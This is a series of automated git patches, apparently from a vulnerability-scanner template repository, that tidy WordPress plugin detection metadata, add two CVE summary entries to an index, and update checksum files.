+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 940591dad89bea7d1ae6bf5c95b4be6bb2332cc6 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 19 Sep 2023 08:20:24 +0000
Subject: [PATCH 0446/1090] Auto Generated New Template Addition List [Tue Sep
 19 08:20:24 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index f349d4b6e1..f0a943da34 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,2 +1,3 @@
 http/cves/2023/CVE-2023-2766.yaml
+http/cves/2023/CVE-2023-4568.yaml
 http/exposures/tokens/jotform/jotform-api-key.yaml

From cdcedb99be84640a919f6af819020444165e5998 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 19 Sep 2023 08:20:37 +0000
Subject: [PATCH 0447/1090] Auto Generated cves.json [Tue Sep 19 08:20:37 UTC
 2023] :robot:

---
 cves.json              | 2 ++
 cves.json-checksum.txt | 2 +-
 2 files changed, 3 insertions(+), 1 deletion(-)

diff --git a/cves.json b/cves.json
index 84a00f96da..2273a85a8e 100644
--- a/cves.json
+++ b/cves.json
@@ -1939,6 +1939,7 @@
 {"ID":"CVE-2023-27482","Info":{"Name":"Home Assistant Supervisor - Authentication Bypass","Severity":"critical","Description":"Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-27482.yaml"}
 {"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"critical","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"}
 {"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"}
+{"ID":"CVE-2023-2766","Info":{"Name":"Weaver OA 9.5 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2766.yaml"}
 {"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"}
 {"ID":"CVE-2023-2796","Info":{"Name":"EventON \u003c= 2.1 - Missing Authorization","Severity":"medium","Description":"The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-2796.yaml"}
 {"ID":"CVE-2023-28121","Info":{"Name":"WooCommerce Payments - Unauthorized Admin Access","Severity":"critical","Description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28121.yaml"}
@@ -2025,5 +2026,6 @@
 {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"}
 {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
 {"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
+{"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
 {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
 {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index 2b3dba12f1..29e238f4cf 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-af5c28a24d60b69449367f1b4cbe204e
+f35b1f6581b1288e40a215fcaffdf901

From e7c56dbe78f126b2da1b9dd9ffb423df403b91c1 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 19 Sep 2023 08:21:07 +0000
Subject: [PATCH 0448/1090] Auto Generated Templates Checksum [Tue Sep 19
 08:21:07 UTC 2023] :robot:

---
 templates-checksum.txt | 411 +++++++++++++++++++++--------------------
 1 file changed, 206 insertions(+), 205 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 4c3830f2f0..d6a58511f6 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -492,7 +492,7 @@ helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2
 helpers/wordpress/plugins/post-smtp.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7
 helpers/wordpress/plugins/post-types-order.txt:31f566259c1a3f810256e3679e10faa457bb4a0b
 helpers/wordpress/plugins/premium-addons-for-elementor.txt:fba90fa57ee2b5dbb2faec1c33e96813ccb14fd5
-helpers/wordpress/plugins/pretty-link.txt:4464e9f2e5e0cf52e9c26d3864e71249d73ea33a
+helpers/wordpress/plugins/pretty-link.txt:eedf6a14348e4bc362e215e4dcd1e066e0bd16f7
 helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/really-simple-ssl.txt:b638f84cceb02801b7ef7b94df984fd22b23f59e
 helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af12
@@ -514,7 +514,7 @@ helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99
 helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:3e2cb2d1f1740c5f32e24ad2ae43138ffd391c84
 helpers/wordpress/plugins/sucuri-scanner.txt:223960ccc78aab169c55e54fb7d9ed6bf1fd29d9
 helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172
-helpers/wordpress/plugins/table-of-contents-plus.txt:40bf252ebc68d2921a7e909064c29fd95a1820fb
+helpers/wordpress/plugins/table-of-contents-plus.txt:9366fd51e17e65e8d9a6aae9f08e1553e1b8170e
 helpers/wordpress/plugins/tablepress.txt:5f6af51e77b84cd6616d4eaa100a736096568d86
 helpers/wordpress/plugins/taxonomy-terms-order.txt:d2a825593d236a4bdf4eeecfe093c2f0318fc0f9
 helpers/wordpress/plugins/the-events-calendar.txt:da12d3bdce91425575a83cf92ced2c2e796b4046
@@ -554,7 +554,7 @@ helpers/wordpress/plugins/wp-mail-smtp.txt:27e1606dc0a2a0c2fa59fc7f5fefdaeacc0b2
 helpers/wordpress/plugins/wp-maintenance-mode.txt:d3a5debecb62b3b70bbb48d3756a5239e112bc34
 helpers/wordpress/plugins/wp-migrate-db.txt:591d71e97a25db692c2f038dbb7d616569b743f4
 helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd
-helpers/wordpress/plugins/wp-optimize.txt:a80f092daaa12261340a5e337b2b07581bbb7e67
+helpers/wordpress/plugins/wp-optimize.txt:8fb53f1274568d9b7cfb82cfa955cf918a9b148a
 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f
 helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a
 helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:d343c69967f4ab0a58418b4f52fe9d4c4e39841f
@@ -562,7 +562,7 @@ helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795c
 helpers/wordpress/plugins/wp-seopress.txt:75c41cf137a9a31823a6e465d81658ce9077457c
 helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5
 helpers/wordpress/plugins/wp-smushit.txt:5e74b23ed477d2de0db916790751da05ed4cee9c
-helpers/wordpress/plugins/wp-statistics.txt:3bf7ffbc26b9cc11db0363f3cac17c05f5b47aff
+helpers/wordpress/plugins/wp-statistics.txt:d5b438b33eefd2351317d48768c3cfdcc2e1fbc7
 helpers/wordpress/plugins/wp-super-cache.txt:e9e533b0da8e5546eff821a40fbf7ca20ab9cf7e
 helpers/wordpress/plugins/wp-user-avatar.txt:88c9e71b6f0f80feda9e73aae625459cce73b1b8
 helpers/wordpress/plugins/wpcf7-recaptcha.txt:255ee3124118ef39f0c2d984854cb0f180c4b1fe
@@ -2651,6 +2651,7 @@ http/cves/2023/CVE-2023-39677.yaml:daf8c05e33f87e1b63ab7d55a6a05773034db0ac
 http/cves/2023/CVE-2023-4173.yaml:6b300087c13e3a095031bc1a2d0f8d8590f1a6d8
 http/cves/2023/CVE-2023-4174.yaml:d2cf616712e64eea743b6c401fbfd482418ec12e
 http/cves/2023/CVE-2023-41892.yaml:e042c550adbe64454aea30c413ded1b9d7a72814
+http/cves/2023/CVE-2023-4568.yaml:a40438e923a862215d522cfad6534b0fb3374249
 http/cves/2023/CVE-2023-4634.yaml:c5b05622b14f1397f91ad6fe9fb478b3c769e071
 http/cves/2023/CVE-2023-4714.yaml:32a365c876f157b1fd267ee9bb74bac368424042
 http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d
@@ -5847,218 +5848,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
-http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
+http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
+http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
-http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
-http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
-http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
-http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
-http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
-http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
-http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
-http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
-http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
-http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
-http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
-http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
-http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
+http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
+http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
+http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
+http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
+http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
+http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
